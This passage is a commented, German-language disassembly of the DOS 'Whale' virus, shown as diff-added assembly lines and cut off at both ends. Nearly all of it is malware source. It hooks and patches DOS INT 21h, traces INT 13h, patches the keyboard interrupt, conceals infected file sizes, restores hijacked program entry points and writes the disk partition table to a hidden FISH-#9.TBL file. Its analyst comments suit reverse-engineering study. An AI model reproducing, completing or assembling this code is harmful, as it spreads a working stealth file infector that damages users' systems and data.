+D24E6 DW ? ; Caller-IP ? +D24E8 DW ? ; Caller-CS ? +D24EA DW ? ; Returnadresse zwischen Push/Pop +D24EC DW ? ; +D24EE DB ? +D24EF DB ? +;--------------------------------------------------------------------- +D24F0 DB ? +EPB DB ? ; Start EPB +D24F2 DW ? ; File-Attribut +D24F4 DW ? ; Offset Filename / ASCIIZ +D24F6 DW ? ; Segment Filename / ASCIIZ +D24F8 DW ? ; +D24FA DW ? ; +D24FC DW ? +D24FE DB ? +;--------------------------------------------------------------------- +D24FF DW ? ; SP-init +D2501 DW ? ; SS-init +D2503 DW ? ; IP-init +D2505 DW ? ; CS-init +;--------------------------------------------------------------------- +Cmd_Line DB 50H dup (?) ; command-line +;--------------------------------------------------------------------- +D2557 DW ? ; Orig.SP +D2559 DW ? ; Orig.SS +Vir_SP DW ? ; Vir. SP +D245D DW ? +D245F DB ? +D2560 DW ? ; Platz fr AX +D2562 DW ? ; Platz fr BX +D2564 DW ? ; Platz fr CX +;-------------------------------( als virtuelle Code-Area genutzt )--- +@INT21 DD ? ; ADRESSE Original INT 21H +D256A DW ? +D256C DW ? +D256E DW ? +;-------------------------------------------( wird "JMP CS:2273" )--- +;-------------------------------------------( also "JMP VirInt09" )--- +D2570 DB ? +D2571 DW ? +D2573 DW ? +;--------------------------------------------------------------------- +D2575 DW ? ; SAVE SI +D2577 DW ? ; SAVE DI +D2579 DW ? ; SAVE AX +D257B DW ? ; SAVE DS +D257D DW ? ; SAVE ES +D257F DW ? ; SAVE CX +;--------------------------------------------------------------------- +D2581 DW ? ; SAVE BX +INT_09 DD ? ; Original INT 09 +D2587 DB ? ; wird bei J02975 geschrieben +D2588 DW ? +D258A DW ? +InfectFlag DB ? ; "1" nach der ersten Infektion +D258D DB ? +D258E DW ? ; Platz fr Flags +;--------------------------------------------------------------------- +D2590 DW ? ; SAVE DX +@INT02 DD ? ; Originaler INT 02 +TrashFlag DB ? ; "1" : Statt einer Infektion, + ; wird Trash weggeschrieben +D2597 DB ? +D2598 DW ? ; hier kommt z.B. "HLT" hin... +D259A DW ? ; +;--------------------------------------------------------------------- +D259C DD ? +D25A0 DB 160h DUP (0) + +D2700: ; VIRUS-STACK -^^^ +;--------------------------------------------------------------------- + DB 100 DUP (0) +J02801: DB 0 +J02802: DB 0 +J02803: DB 0 +J02804: DB 0 +J02805: DB 0 +J02806: DB 0 +J02807: DB 0 +;--------------------------------------------------------------------- +J02808: MOV AH,4Ch ; main() :-))) + MOV AL,[ErrorCode] + INT 21 +ErrorCode DB 00h +;--------------------------------------------------------------------- +; Hier beginnt WHALE +;--------------------------------------------------------------------- +VIRSTART: DB 00h ;02810 +J02811: JMP Decode_Whale +;===================================================================== +;======( Puffer fr die ersten 1Ch Byte des infizierten Programmes)=== +;===================================================================== +EXE_ID: DW 04CB4H ; 'MZ' / MOV AH,4C +EXE_LastBytes: DW 021CDH ; Lastbytes / INT 21 +EXE_Pages: DW 0 ; Pages +EXE_Rel_Count DW 0 ; Reloc-Count +EXE_Paras: DW 0 ; Headerpara +EXE_MinFree: DW 0 ; minfree +EXE_MaxFree: DW 0 ; maxfree +EXE_SS_INIT: DW 0 ; ss-init +EXE_SP_INIT: DW 0 ; sp-init +EXE_ByteSum: DW 0 ; bytesum +EXE_CODE_INIT: DD 0 ; ip-init, cs-init +EXE_Reloc_Ofs: Dw 0 ; reloc-offset +EXE_Ovl_Num: DW 0 ; ovl-num +;--------------------------------------------------------------------- +@FIRSTBYTE: ;<----------------( erstes Byte im oberen Segment )--- +EXE_FLAG DB 0 ; "1" : EXE-FILE +;===================================================================== +;==================================( erster CALL nach Dekodierung )=== +;==================================( 'echter' Einsprung )=== +;===================================================================== +Offset_2831: +ENTRY: CALL J0288E +;--------------------------------------------------------------------- +Vir_NAME: DB "THE WHALE" +;--------------------------------------------------------------------- + DB 0ffh + db 036h + db 0c7h +;----------------------------------------------------------(trash?)--- + PUSH ES +J02842: PUSH BX + INC WORD Ptr DS:[0458h] ; evtl Cursor-Loc auf + JNZ J0284C ; page 5 (??!??) + JMP J02A4F ; -> Nirwana +;====================================================()=============== +J0284C: MOV AX,CS:[BX] + ADD BX,+02h + +J02852: JZ J0287E ; = RET nach altem BX + ADD CS:[BX],AX + LOOP J0284C + POP BX + DB 9fh,06h +;===================================================================== +;==================( folgender Code wird an Adresse 2566h erzeugt )=== +;===================================================================== +;@INT21: DW 2568h ; fr "call word ptr [@int21]" +;D2568: PUSHF +; CALL FAR CS:[Low_INT_21H] ; CALL OLD INT 21 +; RET +;--------------------------------------------------------------------- +CreateTempCode: MOV Word Ptr DS:[@INT21 ],Offset @INT21+2 + POP BX + MOV WORD Ptr DS:[@INT21+2],2E9Ch + ADD BX,+02h ; SIC ! + MOV WORD Ptr DS:[D256A],1EFFh + MOV WORD Ptr DS:[D256C],OFFSET Low_INT_21H + PUSH BX + MOV WORD Ptr DS:[D256E],00C3h +J0287E EQU $-1 ; zeigt auf "RET" + MOV WORD Ptr DS:[Vir_SP],2700h +EIN_RETURN: RETN ; RETURN 2 Byte weiter +;===================================================================== +;---------------------------------------------------------( Trash )--- +J02887: PUSH CX + MOV CX,CS:[BX] + DB 2eh,8bh,1Eh +;===================================================================== +;====================================( Teil-Initialisierung von SI)=== +;====================================( IRET fhrt nach J02983 )=== +;====================================( Wird als erstes ausgefhrt )=== +;===================================================================== +J0288E: POP BX + ADD BX,OFFSET J02983-Offset Vir_NAME + PUSHF + PUSH CS + PUSH BX + MOV SI,BX ; BX = SI = 2983h + IRET +;---------------------------------------------------------( Trash )--- + DB 0E9h,031h,002h,0ffh,0b4h,029h + DB 001h,059h,02eh,0ffh,007h,02eh + DB 023h,037h,05fh,0f3h,0a4h,0EBh +;==================================================================== +J028AB: PUSH DS ; altes DS auf Stack + PUSH CS + POP DS + CALL CreateTempCode ; Return ist 1 word weiter ! + ;-------------- + DW 58EAh + ;-------------- +;===================================================================== +;==================================================( Code-Patcher )=== +;===================================================================== +; BX zeigt auf J03047 +; aus "CMP BX,SI" +; wird +; J03074: XOR CS:[SI],BX +; NOP +; RET +;--------------------------------------------------------------------- +; +J028B3: MOV BX,OFFSET J03047-Offset VirStart + XOR WORD Ptr DS:[BX],0EF15h + ADD BX,+02h + XOR WORD Ptr DS:[BX],4568h + MOV SI,OFFSET J0491A-OFFSET VirStart + POP DS ; Altes DS zurck + CALL PATCH ; Gleich ausfhren ! +;===================================================================== +;======================================( WAL ist jetzt erst scharf)=== +;===================================================================== +AFTER_PATCH: MDECODE 1 + + CALL StopINT_02 + + MOV CS:[D24E3],AX + MOV AH,52h ; sic ! + MOV CS:[PSP_SEG],DS + INT 21 + MOV AX,ES:[BX-02h] ; Hole ersten MCB ! + MOV CS:[D2447],AX + PUSH CS + POP DS + + MOV AL,21h + CALL GetInt_AL + + MOV WORD PTR DS:[Trace_Adres+2],ES ; Get INT 21h + MOV WORD PTR DS:[Trace_Adres ],BX + + MOV DX,Offset Int_01_entry-Offset VirStart + MOV AL,01h + MOV BYTE Ptr DS:[D2450],00h ; keinen bergehen + CALL SetInt_AL ; SET INT 01 + MCODE 1 +;===================================================================== +;===================================================(TRACE INT 21h)=== +;===================================================================== + MDECODE 2 + ;----------------------------- + PUSHF + POP AX + OR AX,0100h ; Tf ein + PUSH AX + POPF + ;----------------------------- + PUSHF + MOV AH,61h + CALL DWORD PTR DS:[Trace_Adres]; TRACE INT 21 + ;----------------------------- + PUSHF + POP AX + AND AX,0FEFFh ; TF aus + PUSH AX + POPF + ;----------------------------- + LES DI,DWORD PTR DS:[Trace_Adres] ; Old int 21h + ;----------------------------- + ; Erzeugt JMP CS:2256/J04A66 + ;----------------------------- + MOV WORD PTR DS:[Low_INT_21H+2],ES + MOV BYTE Ptr DS:[D244B ],0EAh + MOV WORD Ptr DS:[D244C ],2256h + MOV WORD PTR DS:[Low_INT_21H ],DI + MOV WORD PTR DS:[D244E ],CS + ;----------------------------- + CALL J0298D + CALL Patch_IBMDOS + MCODE 2 + CALL Wal_Ins_MEMTOP_Kopieren +;===================================================================== + ; Wal entschwindet zur Speicherobergrenze, husch ..... +;##################################################################### +; +;##################################################################### +;===================================================================== +;====================================( PATCHT INT 09-Verarbeitung )=== +;===================================================================== +INT_09_Patch: MDECODE 3 + PUSH BX + PUSH ES + + MOV AL,09h ; GET INT 09 + CALL GetInt_AL + + MOV WORD PTR CS:[INT_09+2],ES + MOV WORD PTR CS:[INT_09 ],BX + + MOV BYTE PTR CS:[D2570],0EAh ; PATCHE "JMP CS:2273" + MOV WORD PTR CS:[D2573],CS ; INS SCRATCHPAD + MOV WORD PTR CS:[D2571],Offset J04A83-Offset VirStart + ; = JMP CS:4A83 + + CALL Patch_INT_09 + POP ES + POP BX +J02975: MOV BYTE PTR CS:[D2587],00h + + MCODE 3 + RETN +;------------------------------ + DW 027E9H + DW 0EA1Ah +;===================================================================== +;============================================( Get Virstart in SI )=== +;===================================================================== +J02983: SUB SI,OFFSET J02983 - Offset VirStart + JMP J02F15 ; SI ist jetzt 2810h +;===================================================================== + DB 089h,0F3h,0E8H +;===================================================================== +;=========================================( Get INT 2F and INT 13 )=== +;===================================================================== +J0298D: MDECODE 4 + + MOV AL,2Fh ; GET INT 2F + CALL GetInt_AL + + MOV BX,ES + CMP CS:[D2447],BX + JNB J029BC + + CALL Trace_int_13h + + MOV DS,WORD PTR CS:[Trace_Adres+2] + PUSH WORD PTR CS:[Trace_Adres ] + POP DX ; DS:DX + + MOV AL,13h + CALL SetInt_AL ; SET INT 13 + + XOR BX,BX + MOV DS,BX ; DS = 0 + MOV BYTE Ptr DS:[0475h],02h ; Number of Hard-Drives + +J029BC: MCODE 4 + RETN +;===================================================================== +;==========================( Erste Routine, die im Oberen Speicher)=== +;==========================( ausgefhrt wird. )=== +;==========================( AB JETZT ist Offset 2810h = OFFSET 0 )=== +;===================================================================== +J029C1: MDECODE 5 + CALL Patch_IBMDOS ; Original wiederherstellen + MOV CS:[D244E],CS ; JMP CS:2256 korrigieren.. + ; ist jetzt bei 4A66 ... + CALL Patch_IBMDOS ; und wieder Patchen + + PUSH CS + POP DS + PUSH DS + POP ES ; ES=DS=CS + CALL INT_09_Patch ; Patche INT 09 + + MOV BYTE Ptr DS:[InfectFlag],00h + CALL Re_SET_Int_02 + + MOV AX,[PSP_SEG] + MOV ES,AX + LDS DX,ES:[000Ah] ; INT 22h in DS:DX + MOV DS,AX + ADD AX,0010h + ADD CS:[OFFSET EXE_Reloc_Ofs-Offset VirStart],AX + + CMP BYTE PTR CS:[OFFSET EXE_FLAG-OFFSET VIRSTART],00h + ; IST ES EIN EXE ?? + STI + MCODE 5 + JNZ J02A2E +;===================================================================== +;================================( restore Code-Start im alten CS )=== +;===================================================================== + MDECODE 6 + MOV AX,CS:[Offset EXE_ID-Offset VirStart ] + MOV WORD PTR DS:[0100h],AX + MOV AX,CS:[Offset EXE_ID-Offset VirStart+2] + MOV WORD PTR DS:[0102h],AX + MOV AX,CS:[Offset EXE_ID-Offset VirStart+4] + MOV WORD PTR DS:[0104h],AX + + PUSH CS:[PSP_SEG] ; PUSH Start-Segment + XOR AX,AX + INC AH + PUSH AX ; AX = 100h + MOV AX,CS:[D24E3] + MCODE 6 + RETF ; == JMP PSP_SEG:100H == COM-START +;===================================================================== +;=============================================( JMP zum EXE-Start )=== +;===================================================================== +J02A2E: MDECODE 7 + ADD CS:[SS_INIT],AX + MOV AX,CS:[D24E3] + MOV SP,CS:[SP_INIT] +J02A41: MOV SS,CS:[SS_INIT] + MCODE 7 + JMP DWORD PTR CS:[CODE_INIT] +;=========================================================(trash !)=== +J02A4F: PUSH AX + MOV AX,0000h + MOV DS,AX + POP AX + MOV BX,Word ptr CS:[06C7h] ; CS:2ED7 = E3CB + MOV Word Ptr DS:[000CH],BX ; INT 3 setzen ! + MOV Word Ptr DS:[000EH],CS + DB 0E8h ; CALL 5DBA ?!? +;===================================================================== +;==============================================( TRACE-ROUTINE )====== +;===================================================================== +J02A63: PUSH BP + XOR BX,BX + MOV BP,SP + MOV DS,BX + AND WORD Ptr [BP+06h ],0FEFFh ; ? Change Flags ? + MOV Word Ptr DS:[0004h],AX + MOV Word Ptr DS:[000Eh],CS ; SET INT 3 SEGMENT + MOV Word Ptr DS:[000Ch],SI ; SET INT 3 OFFSET + CALL J02CD8 ; Kein Return, sondern + ; sowas wie 'IRET' +;===================================================================== +J02A7D: +;======================================================( Trash ???)=== + DB 0E9h,0f2h,0eh + DB 0BEh ;02A80 + DB 0BBh ;02A81 + DB 0ABh ;02A82 + DB 0EBh ;02A83 + DB 0EFh ;02A84 + DB 0AFh ;02A85 + DB 0BBh ;02A86 + DB 0EFh ;02A87 + DB 2 DUP (0ABh) ;02A88 + DB 2 DUP (0BFh) ;02A8A + DB 0EFh ;02A8C + DB 0ABh ;02A8D + DB 0EBh ;02A8E + DB 2 DUP (0ABh) ;02A8F + DB 0BFh ;02A91 + DB 0EBh ;02A92 + DB 0EFh ;02A93 + DB 0EBh ;02A94 + DB 2 DUP (0ABh) ;02A95 + DB 0FBh ;02A97 + DB 0ABh ;02A98 + DB 0EBh ;02A99 + DB 0BFh ;02A9A + DB 0BBh ;02A9B + DB 0BFh ;02A9C + DB 0ABh ;02A9D + DB 0EBh,2Eh,80h,0fh + DB 0abh,0e2h,0f9h +;===================================================================== +;---( Hier wird der Code neu reloziert, so da Virstart zum )--- +;---( Offset 0 wird. Dazu wird das neue Codesegment errechnet und )--- +;---( spter ber RETF angesprungen. Die Routine muss ausgefhrt )--- +;---( werden, bevor der Code scharf gemacht wird. Der Patcher )--- +;---( geht vom neuen Codesegment aus. )--- +;===================================================================== +Relokator: CALL DecodeFollowingCode +J02AA8: xor sp,sp ; Stack verwerfen ! + call L2AAD +L2AAD: mov bp,ax ; AX = 0 + mov ax,cs + mov bx,0010H + mul bx ; AX = CS * 16 + pop cx ; CX = Offset L2AAD + sub cx,OFFSET L2AAD-OFFSET VIRSTART + ; CX = Offset L2AAD - 29D + ; = Offset VirStart = 2810h + add ax,cx ; DX:AX := CS*10+2810 + adc dx,0000 ; + div bx ; DX:AX := CS+281 + push ax ; Ergebnis auf Stack, + ; (== Segment Returnadresse ) + mov ax,Offset J028AB-Offset VirStart + ; Offset Returnadresse ; (CS+281h):09Bh + + push ax + mov ax,bp ; AX = 0 + call VersteckeCodeWieder +J02ACC: retf ; RETURN nach CS:28AB, immer ! +;===========================================================(trash)=== +J02ACD: DB 0B4h,03 ; MOV AH,03h + DB 8bh,0D8h ; MOV BX,AX + DB 0E9H ; JMP J02BBC +;===================================================================== +;=============================================( Setzen von INT 01 )=== +;===================================================================== +J02AD2: CALL J02AD5 +J02AD5: POP BX ; BX = 2AD5 + SUB BX,OFFSET J02AD5-OFFSET J02A63 + ; BX = 2A63 + PUSH BX ; + POP WORD PTR DS:[0004h] ; INT 01 Offset = 2A63 + PUSH CS + POP WORD PTR DS:[0006h] ; INT 01 Segment= CS + PUSH CS +J02AE4: POP AX + OR AX,0F346h ; SET TF + PUSH AX + POPF + +J02AEA: XLAT ; MOV AL,[BX+AL] + MOV BH,AL ; MOV AL,[2AA9+x] + ADD BX,CX +J02AEF: JMP J047B1 +;=========================================================( trash )=== + MOV AX,[BX ] + MOV BX,[BX+SI] + XOR AX,AX + MOV DS,AX + JMP J02AE4 +;===================================================================== +;==========================( wird von INT 3 / INT 21h angesprungen)=== +;===================================================================== +J02AFB: MDECODE 8 + push bx + mov bx,sp + mov bx,ss:[bx+06] ; HOLE Flags vom Caller-Stack + mov cs:[D24B3],bx ; und merke sie + pop bx + + push bp ; BP bleibt auf Stack + mov bp,sp + call StopINT_02 + call SaveRegisters + call Patch_IBMDOS + call GetRegsFromVirStack + call PUSHALL + MCODE 8 +;===================================================================== +;=====================( sucht zu Wert in AL den passenden Handler )=== +;===================================================================== +GetHandler: MDECODE 9 + CALL PushALL + MOV WORD PTR CS:[D2598],OFFSET J02B8B-Offset VirStart + MOV BX,Offset J02B45-Offset VirStart + MOV CX,000Fh +J02B38: CMP CS:[BX],AH + JZ J02B72 + ADD BX,+03h + LOOP J02B38 + JMP J02B7B +;===================================================================== +J02B45: ;=================================( Tabelle )========= + if_then <00fh,L0699> ; 2EA9 ; open FCB + if_then <011h,L04F4> ; 2D04 ; Findfirst FCB + if_then <012h,L04F4> ; ; Findnext FCB + if_then <014h,L06E0> ; 2EF0 ; Read Seq. FCB + if_then <021h,L06CA> ; 2EDA ; Read Random FCB + if_then <023h,L08CF> ; 30DF ; Get Filesize FCB + if_then <027h,L06C8> ; 2ED8 ; Read Rndm Block FCB + if_then <03dh,L0996> ; 31A6 ; OPEN FILE / HANDLE + if_then <03eh,L09E4> ; 31F4 ; CLOSE File / Handle + if_then <03fh,L1E5E> ; 466E ; READ File / Handle + if_then <042h,L1DA2> ; 45B2 ; SEEK / Handle + if_then <04Bh,L0AD4> ; 325D ; EXEC + if_then <04Eh,L1F70> ; 4780 ; FindFirst ASCIIZ + if_then <04Fh,L1F70> ; 4780 ; FindNext ASCIIZ + if_then <057h,L1D0F> ; 451F ; Set/Get Filedate +;===================================================================== +J02B72: INC BX + PUSH CS:[BX ] + POP CS:[D2598] ; Adresse in D2598 +J02B7B: CALL PopALL +J02B7E: MCODE 9 + JMP CS:[D2598] ; Springe zu [2598] +;================================================================()=== +J02B87: PUSH SI ; ?!?!?! + JMP J0491B + +;===================================================================== +;==========================================( Low-INT-21h aufrufen )=== +;===================================================================== +J02B8B: JMP J048F3 +;=========================================================( trash )=== + DB 043h,041h,031h,00fh,039h,00fh,077h +;===================================================================== +;================================================( Beendet Int21h )=== +;===================================================================== +IRET_Int21h: MDECODE 10 + CALL SaveRegisters + CALL Patch_IBMDOS + CALL GetRegsFromVirStack +J02BA3: MOV BP,SP + PUSH CS:[D24B3] ; PUSH Flags nach IRET + POP [BP+06] ; POP Flags ---"---- + POP BP + CALL Re_SET_Int_02 + MCODE 10 + IRET +;===================================================================== +J02BB6: DB 0D7h,03Ch,0FFh,075h +;===================================================================== +;=============================================( Pop alle Register )=== +;===================================================================== +; ---------------- hilfsweise eingefgt : +; J02BB6: XLAT +; CMP AL,0FFh +; JZ J02BA3 +; XCHG AL,BYTE PTR DS:[0C912H] ; MUELL !!! +; JMP J02BBF +; ---------------- hilfsweise eingefgt : +; J02BBC: PUSH ES +; ADC CL,CL +; JMP J02BBF +; ---------------- Ende einfgung +;===================================================================== +;=============================================( Pop alle Register )=== +;===================================================================== +J02BBC EQU $+2 +PopALL: MDECODE 11 +J02BBF: POP CS:[D24EA] + POP ES + POP DS + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + POPF + MCODE 11 + JMP CS:[D24EA] +;===================================================================== + DB 0F6h +;===================================================================== +;==========================( Holt alle Register aus dem Vir-Stack )=== +;===================================================================== +GetRegsFromVirstack: + MDECODE 12 + MOV Word Ptr CS:[D2557],SP + MOV Word Ptr CS:[D2559],SS + PUSH CS + POP SS + MOV SP,Word Ptr CS:[Vir_SP] + + CALL CS:PopALL + + MOV SS,Word Ptr CS:[D2559] + MOV Word Ptr CS:[Vir_SP],SP + MOV SP,Word Ptr CS:[D2557] + MCODE 12 + RETN +;===================================================================== + DB 0BEh ;02C05 + DB 0AFh ;02C06 + DB "4" ;02C07 + DB 0Eh ;02C08 + DB "[SZR" ;02C09 + DB 8Fh ;02C0D + DB 06h ;02C0E +;===================================================================== +;========( 2c0f )=======================( Patcht INT 21 in IBMDOS )=== +;===================================================================== +Patch_IBMDOS: MDECODE 13 +;--------------------------------------------------------------------- + MOV SI,Offset D244B + LES DI,CS:[Low_INT_21H] + PUSH CS + POP DS + CLD + MOV CX,0005h ; Tauscht 5 Byte im DOS aus gegen + ; einen FAR-JMP zur Wal-Routine ! +J02C22: LODSB + XCHG AL,ES:[DI] + MOV [SI-01h],AL + INC DI + LOOP J02C22 + MCODE 13 + RETN +;=====================================================( trash ?!? )=== +J02C31: XOR AX,CX + INC BX + OR ES:[BX],AX + LOOP J02C31 + MOV BX,CX + DB 0E8h ;... trash ! +;===================================================================== +;============================================( pusht alle register)=== +;===================================================================== +PushALL: MDECODE 14 + POP CS:[D24EA] + PUSHF + PUSH AX + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH DS + PUSH ES + MCODE 14 + JMP CS:[D24EA] +;===================================================================== +;========================================( setzt INT 01 auf Tracer)=== +;===================================================================== +SetInt_01: MDECODE 15 + MOV AL,01h + PUSH CS + POP DS + MOV DX,Offset Int_01_entry-Offset VirStart + CALL SetInt_AL ; SET INT 01 + MCODE 15 + RETN +;===================================================================== +;===========================( setzt INT ( nummer in AL) auf DS:DX )=== +;===================================================================== +SetInt_AL: MDECODE 16 + PUSH ES + PUSH BX + XOR BX,BX + MOV ES,BX + MOV BL,AL + SHL BX,1 + SHL BX,1 + MOV ES:[BX ],DX + MOV ES:[BX+02h],DS + POP BX + POP ES +J02C88 EQU $+2 + MCODE 16 + RETN +;===================================================================== +;==============================(sichert Register auf eigenem Stack)=== +;===================================================================== +SaveRegisters: MDECODE 17 + MOV CS:[D2557],SP + MOV CS:[D2559],SS + PUSH CS + POP SS + MOV SP,CS:[Vir_SP] + CALL CS:PUSHALL + MOV SS,CS:[D2559] + MOV CS:[Vir_SP],SP + MOV SP,CS:[D2557] + MCODE 17 + RETN +;===================================================================== +;==============================( holt INT ( nummer AL ) nach ES:BX)=== +;===================================================================== +GetInt_AL: MDECODE 18 + PUSH DS + PUSH SI + XOR SI,SI + MOV DS,SI + XOR AH,AH + MOV SI,AX + SHL SI,1 + SHL SI,1 + MOV BX,[SI] + MOV ES,[SI+02h] + POP SI + POP DS + MCODE 18 + RETN +;===================================================================== +;=========================( Zweiter Teil der Trace-Routine J02A63 )=== +;===================================================================== +J02CD8: POP AX ; AX = 2A7Dh +J02CDA EQU $+1 ; = INC SI + ; OR [BX],AL + ; XCHG BX,[BP+08h] , usw. + + ADD WORD Ptr [BP+08h],+07h ; Change IP after IRET ?? + XCHG BX,[BP+08h] + MOV DX,BX + XCHG BX,[BP+02h] + + SUB SI,@0478 ; = ADD SI,@FB88 + MOV BX,SI ; + ADD BX,SwapCode_6 ; 04EFh + + POP BP ; Original BP aus Trace-Routine + ; J02A63 + PUSH CS:[SI+SwapCode_8] ; dort steht "E9CF" + POP AX ; AX = "E9CF" + XOR AX,020Ch ; AX = "EBC3" + MOV CS:[BX],AL ; PATCHT INT 3 WEG : INT 3 -> RET + ; Spielt aber gefhrlich mit der Queue, + ; kein Wunder, dass das Teil auf ATs + ; nicht funktioniert... + ADD AX,020Ch ; AX = EDCF +;********************************************************************* +CALL EIN_RETURN ;************ Eingefgt ********************** +;********************************************************************* +J02CFF: INT 3 ; -> RET + ; ABER RET [SP+2] !!!!! + ; das heisst : Ende der Trace-Routine + ; ist hier. +;===================================================================== +J02D00: JMP J02D60 + DB 0EBh +;===================================================================== +;====================( Handler fr Findfirst/Findnext FCB / AH=11 )=== +;===================================================================== +J02D04: MDECODE 19 + CALL PopALL + CALL CS:[@INT21] ; CALL INT 21H + OR AL,AL + MCODE 19 + JZ J02D1C + JMP IRET_Int21h + ;------------------ +J02D1C: MDECODE 20 + CALL PushALL + CALL GetDTA + MOV AL,00h + CMP BYTE Ptr DS:[BX],0FFh ; Extended FCB ? + JNZ J02D34 + + MOV AL,[BX+06h] ; dann Attribut -> AL + ADD BX,+07h ; und zum Normalen FCB +J02D34: AND CS:[D24F0],AL ; + TEST BYTE Ptr DS:[BX+18h],80h; reserved..Shit + MCODE 20 + JNZ J02D46 + JMP J02EA3 ; fertig + +J02D46: SUB BYTE Ptr DS:[BX+18h],80h + CMP WORD Ptr DS:[BX+1Dh],Code_len + JNB J02D54 + JMP J02EA3 ; fertig + +J02D54: SUB WORD Ptr DS:[BX+1Dh],Code_len + SBB WORD Ptr DS:[BX+1Fh],+00h + JMP J02EA3 ; fertig +;===================================================================== +J02D60: LOOP J02D66 ; wenn CX <> 0 dann J02D66 + JMP J03251 ; sonst J03251 -> J034D4 +;--------------------------------------------------------------------- + DB 0ebh ; TRASH ! +;--------------------------------------------------------------------- +J02D66: INC BX + JMP J02FA2 +;===================================================================== +;===============================================( Suche nach Fish )=== +;===================================================================== +Suche_Fish: MDECODE 21 + CALL PushALL + IN AL,40h ; Hole Zufallszahl + CMP AL,40h ; ist sie < 40h, dann Partitionstabelle + MCODE 21 ; lesen und FISH.TBL erzeugen + JB J02D7F + JMP J02E9F ; sonst nicht. +;===================================================================== +;============( LESEN der Partitionstabelle bei jeder 4. Infektion )=== +;===================================================================== +J02D7F: MDECODE 22 + MOV AL,01h ; EINEN SEKTOR + MOV AH,02h ; LESEN + PUSH CS + POP BX + SUB BH,10h ; + MOV ES,BX ; NACH ES:0000h + MOV BX,0000h ; + MOV CH,00h ; SPUR 0 + MOV CL,01h ; SEKTOR 1 ( Partitionstabelle ) + MOV DH,00h ; 1. HEAD + MOV DL,80h ; 1. FESTPLATTE + PUSHF + CALL DWORD PTR CS:[Trace_Adres] ; INT 13h ! + MCODE 22 + JNB J02DA9 + JMP J02E9F +;===================================================================== +;=========================( erzeugen der FISH.TBL als HIDDEN-File )=== +;===================================================================== +J02DA9: MDECODE 23 + PUSH CS + POP DS + MOV AH,5Bh ; CREATE NEW FILE + MOV CX,0002h ; ATTRIBUT "SYSTEM" + MOV DX,OFFSET D2DDB-Offset VirStart + ; NAME IN DS:05CBH/CS:D2DDB + CALL CS:[@INT21] + JNB J02DC2 + JMP J02E9B +J02DC2: PUSH ES + POP DS + MOV BX,AX + MOV AH,40h ; schreibe + MOV CX,0200h ; 200h Byte + MOV DX,0000h ; ab ES:0000 + ; Partitionstabelle + CALL CS:[@INT21] + JB J02DD8 + JMP J02E85 +J02DD8: JMP J02E9B + ;============================================================= +D2DDB DB "C:\FISH-#9.TBL",0 +D2DEA DB "FISH VIRUS #9 " + DB "A Whale is no Fish! " + DB "Mind her Mutant Fish and the hidden Fish Eggs for " + DB "they are damaging. " + DB "The sixth Fish mutates only if Whale is in her Cave" + ;============================================================= +J02E85: PUSH CS + POP DS + MOV AH,40h + MOV CX,009Bh + MOV DX,OFFSET D2DEA-Offset VirStart + CALL DS:[@INT21] + JB J02E9B + MOV AH,3Eh + CALL DS:[@INT21] +J02E9B: MCODE 23 +J02E9F: CALL PopALL + RETN +;--------------------------------------------------------------------- +J02EA3: CALL PopALL + JMP IRET_Int21h +;===================================================================== +;================================( Handler fr OPEN FCB , AH = 0F )=== +;===================================================================== +J02EA9: MDECODE 24 + CALL PopALL + CALL CS:[@INT21] + CALL PushALL + OR AL,AL + MCODE 24 +;============================== + JNZ J02EA3 ; fertig + + MOV BX,DX + TEST BYTE Ptr DS:[BX+17h],80h + JZ J02EA3 ; fertig + SUB BYTE Ptr DS:[BX+17h],80h + SUB WORD Ptr DS:[BX+10h],Code_len ; unerkannt + ; bleiben + SBB BYTE Ptr DS:[BX+12h],00h + JMP J02EA3 ; fertig +;===================================================================== +;=============================( Handler fr Read Random Block FCB )=== +;===================================================================== +J02ED8: JCXZ J02F08 +;===================================================================== +;===================================( Handler fr Read Random FCB )=== +;===================================================================== +J02EDA: MDECODE 25 + MOV BX,DX + MOV SI,[BX+21h] + OR SI,[BX+23h] + MCODE 25 + JNZ J02F08 + JMP J02F03 + DB 0e8h +;===================================================================== +;================================( Handler fr Read Seq. FCB.AH=14)=== +;===================================================================== +J02EF0: MDECODE 26 + MOV BX,DX ; DS:DX ist Adresse des geffneten FCB + MOV AX,[BX+0Ch] ; +J02EFA: OR AL,[BX+20h] + MCODE 26 + JNZ J02F08 + +J02F03: CALL J0397A ; SAVEREGS,ES=DS, DI=DX+0Dh + JNB J02F55 ; Datei ist ausfhrbar +J02F08: JMP J02B8B ; sonst : CALL LOW-INT-21 +;===================================================================== +J02F0B: JMP J03251 ; -> J034D4 +;-----------------------------------------------------------(trash)--- + MOV [BP+02h],DX + MOV [BP+04h],CX + DB 0EBh +;--------------------------------------------------------------------- +;------------------------( erste Proc nach Initialisierung von SI )--- +;--------------------------------------------------------------------- +J02F15: IN AL,21h ; SI = 2810h / VirStart + OR AL,02h + OUT 21h,AL + XOR BX,BX + PUSH BX ; PUSH 0 auf Stack + MOV BP,0020h + POP DS ; DS = 0000 + MOV CX,BP ; CX = 0020 + CALL $+3 ; GET IP + POP BX ; BX = 2F27 + PUSH BX + POP DX ; DX = 2F27 + PUSH CS + POP AX ; AX = CS + ADD AX,0010h ; AX = CS:0100 + ADD BX,AX + XOR DX,BX + +J02F33: SUB SI,@FB88 ; ADD SI,478h; SI = 2C88 + ; AX = 5BC0 + ; BX = 8AE7 + ; CX = 0020 + ; DX = A5C0 + ; DS = 0000 + CALL J02AD2 ; + ; 2F3A auf Stack als ret-adr + ;------>(J02EC8)----[keine Rckkehr vom CALL ! ]------ + ;----------------------------------------------------- + DB 0E9H +;===================================================================== +;====================================================( no entry...)=== +;===================================================================== + MOV BYTE PTR [DI],0EBH + JMP J035E3 ; Erzeugt eine 7 Byte-Tabelle und checkt + ; Verfallsdatum +;===================================================================== +;====================================================( no entry...)=== +;===================================================================== +J02F41: XCHG DX,BX +J02F43: MOV WORD PTR DS:[0004h],BX + OR CX,CX + JZ J02F0B + DEC CX + JMP J02FA2 +;-------------------------------------------------------------------- + DB 1Ch,00,53h,57h,0E8h +;===================================================================== +;============================( zum Handler fr Read Seq. FCB.AH=14)=== +;===================================================================== +J02F55: MDECODE 27 + CALL CS:[@INT21] ; CALL INT 21h + MOV [BP-08],CX + MOV [BP-04],AX + PUSH DS + PUSH DX + CALL GetDTA + CMP Word Ptr DS:[BX+14],1 + MCODE 27 + JZ J02FF6 +;==========================================( check auf infektion )=== +J02F7A: MDECODE 28 + MOV AX,[BX ] + ADD AX,[BX+02h] + 